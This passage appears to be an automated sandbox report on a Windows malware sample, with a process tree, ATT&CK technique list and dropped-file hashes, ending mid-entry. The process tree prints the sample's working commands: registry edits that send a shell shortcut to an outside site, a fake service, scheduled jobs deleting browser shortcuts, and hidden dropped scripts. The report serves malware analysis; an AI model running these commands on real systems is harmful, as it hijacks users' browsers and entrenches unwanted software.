      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://www.dao666.com/?in" /f
      4⤵
      Modifies registry class
      PID:1788
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder"
      4⤵
      Modifies registry class
      PID:2256
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f
      4⤵
      Modifies registry class
      PID:1672
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f
      4⤵
      Modifies registry class
      PID:668
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f
      4⤵
      Modifies registry class
      PID:2160
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f
      4⤵
      Modifies registry class
      PID:2888
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\runonce.cmd
    3⤵
    PID:1504
  - - C:\Windows\SysWOW64\sc.exe
      sc create Schedule binpath= "C:\Windows\svchost.exe -k netsvcs" depend= rpcss start= auto displayname= "Task Scheduler"
      4⤵
      Launches sc.exe
      PID:1528
  - - C:\Windows\SysWOW64\sc.exe
      sc config Schedule start= auto
      4⤵
      Launches sc.exe
      PID:1376
  - - C:\Windows\SysWOW64\net.exe
      net start "Task Scheduler"
      4⤵
      PID:888
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start "Task Scheduler"
        5⤵
        
        PID:1820
  - - C:\Windows\SysWOW64\at.exe
      at 8:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:1188
  - - C:\Windows\SysWOW64\at.exe
      at 8:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:2104
  - - C:\Windows\SysWOW64\at.exe
      at 8:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:2248
  - - C:\Windows\SysWOW64\at.exe
      at 9:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:1988
  - - C:\Windows\SysWOW64\at.exe
      at 9:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:2108
  - - C:\Windows\SysWOW64\at.exe
      at 9:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:2988
  - - C:\Windows\SysWOW64\at.exe
      at 10:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:2016
  - - C:\Windows\SysWOW64\at.exe
      at 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:592
  - - C:\Windows\SysWOW64\at.exe
      at 10:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:784
  - - C:\Windows\SysWOW64\at.exe
      at 11:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:1048
  - - C:\Windows\SysWOW64\at.exe
      at 11:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:1496
  - - C:\Windows\SysWOW64\at.exe
      at 11:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:2576
  - - C:\Windows\SysWOW64\at.exe
      at 12:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:400
  - - C:\Windows\SysWOW64\at.exe
      at 12:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:1952
  - - C:\Windows\SysWOW64\at.exe
      at 12:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:1640
  - - C:\Windows\SysWOW64\at.exe
      at 13:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:2012
  - - C:\Windows\SysWOW64\at.exe
      at 13:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:2568
  - - C:\Windows\SysWOW64\at.exe
      at 13:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:2464
  - - C:\Windows\SysWOW64\at.exe
      at 14:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:764
  - - C:\Windows\SysWOW64\at.exe
      at 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:1984
  - - C:\Windows\SysWOW64\at.exe
      at 14:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:1040
  - - C:\Windows\SysWOW64\at.exe
      at 15:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:776
  - - C:\Windows\SysWOW64\at.exe
      at 15:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:1160
  - - C:\Windows\SysWOW64\at.exe
      at 15:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:1016
  - - C:\Windows\SysWOW64\at.exe
      at 16:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:920
  - - C:\Windows\SysWOW64\at.exe
      at 16:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:2280
  - - C:\Windows\SysWOW64\at.exe
      at 16:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:1804
  - - C:\Windows\SysWOW64\at.exe
      at 17:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:1732
  - - C:\Windows\SysWOW64\at.exe
      at 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:2284
  - - C:\Windows\SysWOW64\at.exe
      at 17:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:2192
  - - C:\Windows\SysWOW64\at.exe
      at 18:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:612
  - - C:\Windows\SysWOW64\at.exe
      at 18:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:2440
  - - C:\Windows\SysWOW64\at.exe
      at 18:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:900
  - - C:\Windows\SysWOW64\at.exe
      at 19:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:2492
  - - C:\Windows\SysWOW64\at.exe
      at 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:2484
  - - C:\Windows\SysWOW64\at.exe
      at 19:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:2316
  - - C:\Windows\SysWOW64\at.exe
      at 20:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:1620
  - - C:\Windows\SysWOW64\at.exe
      at 20:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:2876
  - - C:\Windows\SysWOW64\at.exe
      at 20:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:2052
  - - C:\Windows\SysWOW64\at.exe
      at 21:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:2708
  - - C:\Windows\SysWOW64\at.exe
      at 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:2724
  - - C:\Windows\SysWOW64\at.exe
      at 21:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:2760
  - - C:\Windows\SysWOW64\at.exe
      at 22:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:2872
  - - C:\Windows\SysWOW64\at.exe
      at 22:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:2344
  - - C:\Windows\SysWOW64\at.exe
      at 22:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:2728
  - - C:\Windows\SysWOW64\at.exe
      at 23:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:2664
  - - C:\Windows\SysWOW64\at.exe
      at 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:2672
  - - C:\Windows\SysWOW64\at.exe
      at 23:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:2936
  - - C:\Windows\SysWOW64\at.exe
      at 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:3040
  - - C:\Windows\SysWOW64\at.exe
      at 00:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:3060
  - - C:\Windows\SysWOW64\at.exe
      at 00:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:2148
  - - C:\Windows\SysWOW64\at.exe
      at 10:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
      4⤵
      PID:2792
  - - C:\Windows\SysWOW64\at.exe
      at 10:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"
      4⤵
      PID:2572
  - - C:\Windows\SysWOW64\at.exe
      at 10:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd
      4⤵
      PID:2668
  - - C:\Windows\SysWOW64\at.exe
      at 10:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
      4⤵
      PID:2256
  - - C:\Windows\SysWOW64\at.exe
      at 14:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
      4⤵
      PID:668
  - - C:\Windows\SysWOW64\at.exe
      at 14:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"
      4⤵
      PID:2160
  - - C:\Windows\SysWOW64\at.exe
      at 14:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd
      4⤵
      PID:1676
  - - C:\Windows\SysWOW64\at.exe
      at 14:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
      4⤵
      PID:2772
  - - C:\Windows\SysWOW64\at.exe
      at 19:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
      4⤵
      PID:1440
  - - C:\Windows\SysWOW64\at.exe
      at 19:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"
      4⤵
      PID:1300
  - - C:\Windows\SysWOW64\at.exe
      at 19:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd
      4⤵
      PID:888
  - - C:\Windows\SysWOW64\at.exe
      at 19:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
      4⤵
      PID:1188
  - - C:\Windows\SysWOW64\at.exe
      at 21:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
      4⤵
      PID:2104
  - - C:\Windows\SysWOW64\at.exe
      at 21:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"
      4⤵
      PID:2248
  - - C:\Windows\SysWOW64\at.exe
      at 21:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd
      4⤵
      PID:3000
  - - C:\Windows\SysWOW64\at.exe
      at 21:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
      4⤵
      PID:1128
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\copy.cmd
    3⤵
    - Drops file in Program Files directory
    - Drops file in Windows directory
    PID:2056
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\WinWare\fav\fav.cmd"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:1860
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\Windows\360SE.vbs"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:400
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\Windows\36OSE.vbs"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:1140
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\WinWare\tool.cmd"
      4⤵
      Sets file to hidden
      Drops file in Program Files directory
      Views/modifies file attributes
      PID:1856
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\WinWare\360.cmd"
      4⤵
      Sets file to hidden
      Drops file in Program Files directory
      Views/modifies file attributes
      PID:1948
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\WinWare\361.cmd"
      4⤵
      Sets file to hidden
      Drops file in Program Files directory
      Views/modifies file attributes
      PID:1640
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\360.cmd
    3⤵
    - Drops file in Program Files directory
    PID:556
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\cpa.cmd
    3⤵
    PID:2464
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C del .\runonce.cmd
    3⤵
    PID:2664

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
f137e040518ffdf7eb581b97f72179b2

SHA1
95b840b9e14351a74d4e506563e3aee320fc6bde

SHA256
6fbbcee9e2bf83164f5d0548369966b991a5645719b0fc174d50694c4d5b3551

SHA512
887ae713fe90dd3a3f15fc43f9aa5165c896428060da4264a3b10e9059db38f5de69578122796c6a322995f0f7f11e74839ae1ceb3d2c5b34d8b52e8fe6094a5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
435eaab81c82618cd02a918fc75e0fd6

SHA1
236abb3d24ca66caad78b009ad4626e17c44b445

SHA256
642a283d652ab8c275a27d64fea031d2fd582884620f1baecf4e748190327bfb

SHA512
8360356001bf9a9d68c595bcf2a97b94abb55d4ef937a45f307bb5b2de7d450cc7c8d62d0fb53c2cacad7df4bd804595bd99f058c39bc2df0882106e2481a52a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
48685697be26b7d81b1b37ad2fe74a49

SHA1
888165f21336c42aa34916e32d152e593833c9fe

SHA256
d7f6ed3a148f818f277cf96785f5f67cae40d7aca99bb6726a5739dbdbed471f

SHA512
705b614c5d3297a91f891e31d9b2c9c0cf864bfd8dbc035ef03e2a56ef7fcc1f1cefee9474a8195f52c715e105c5cb214cbf5c969fd0e58a2b35447891a33a13

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
b083031dccc88d047994e47a93207afb

SHA1
41e17e4828fecd6b1e70bbd99c88bb0da7e6fe13

SHA256
a90fef1b8055313ecbbdfd4286af7fc853c89799de9a79a8503deab8c344cfa1

SHA512
c0f68f3697015fefe67637ad2a430a03f61e4580fbc6d0580711f395409fee3450943663fe724899404831f113a3cd01bfabb61b97dd9bc4b3bed605f4bd8410

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
3969e8f517b96c8cbb0d623e368629c1

SHA1
56f9cb8698ac5a38c79a520ef81648a01da8ca56

SHA256
9c0bf91107a8bc351d9984a254e5b19f48da2af5c4a0c3fda9eb92d5c80c9451

SHA512
271d6e015245ebb25c7e2008bd8f30269540aa93aae2acdf696c778ccb9250fea024937e51b96f5a20ba4df5a5f6e010fbafbf1e8f8a2bc583d307da15f6e97e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
237133a64d9d92116ed5b0b5caa679fd

SHA1
a37d5fdaced045aa0ff7c16013d613f807a401cb

SHA256
7567e303a182a35062f6cecf4963a3c78a1305159d11019cb054fd1f137c3c1a

SHA512
64e8d277bb87e09ac35b00982d242b47f420ea05f00a13040d43e5ce7ee8eb412584fab8e2e1bd4d975e9da1d81c2f5238dfb844974253b98bb37573951895f0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
43c7c52b12405b83330c4eece9b2ae36

SHA1
0f4a57de92a9436f3e38dec234e57e8da1f08e8b

SHA256
33a5a6655cb6d21b32f97fd9405c898da6e87a94232d1f490ff4179f33b14440

SHA512
4618134085447ba629087f6619d04c33c58e5463ec289d452abd24f86ec4adc4189997c3dbdcc72149f3bc26bfa7ff9dbc03449b1592bfe0343c5526f70c5120

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
aed40aa44673b546d17edf33f40845b9

SHA1
ce050229602b3b7f81d0a7fb85961223e08e1496

SHA256
6ac9c09945299fa136fc65753c0d51683da662381206da1e081bd5bc20d70cd6

SHA512
1b4f7c37952acd92190764865e7a2a86bd5b1f2f1545a46300c1c4a7229ba4cedb459cb51847dc020f02233a9f8a90f5371eba286375d06c2ca73335ec806fd3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
021f839b2c160c95bad49052be1132ad

SHA1
41ad7fe0dcfc226bfe7ade5d90ca886c78ef600e

SHA256
5aa891cee09f1bb6562211a44f49c4d189843868109a3b69e5016cb03e518561

SHA512
a5c2195ba0d5365316ddb467e1e18cfe1bbbe03d5a4b5ce213c424b9246a0de09ce30db019782c34da9c4ae7cdbe6eeee6e0dee71e2b2cf86b02671d92f360dd

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
bde70aaa02de00dd3d3dbe814b1b3dcf

SHA1
1390edaa51bc9ea866617d990f99a04a4e41ae8c

SHA256
c1798c70cd4ff69f1095ba677debbea960a8dbfbf89ec391218c245de3f9b7de

SHA512
133de0582323c1e5ee26e628362e0345e27be671de9739407ce7d6f693f398a5cc41256b83d8e4af1c5ececcd02b6769bb49a70d4a45d33cf2b835a4c2a10285

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
079927ba754a3b5b5d3d82d06ac15d75

SHA1
e220fd9e19b6fe5361cd3de2e6474dd2b4d1f1eb

SHA256
e752833b6489bbe01010b0707dae5576d26d8f0bfd332eca5550b648dcb7350a

SHA512
fdb7c312db21fb71d071e48745c2cca91834b21fa918a57a1f96ef218662c275a3bef42cca47f5a1ee9de6f56b53d92cdd442b40b0fb2c7c7ed5e29e7cd62bcf

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
80be5a41c1bc047eb5c223c8728d1e73

SHA1
1b3bc658c7d1727a68cc3af4e34294e934f4f31b

SHA256
a81ae17b90fd007eea7ba6ebc59880ab999235c5e758d715208b1e3103d55936

SHA512
b62779929b07e839ded426d7e7e918313e728aa0d6dfb3e0773eb5a3994224d2939f30387a11dd0f775cadfe46ea938969b98e45e482d2fff80ea54c880f38a0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
c074c681826c725d1e2f48cbe1d5826a

SHA1
567ee670e677b90e2db1961be828e63ca9297ae0

SHA256
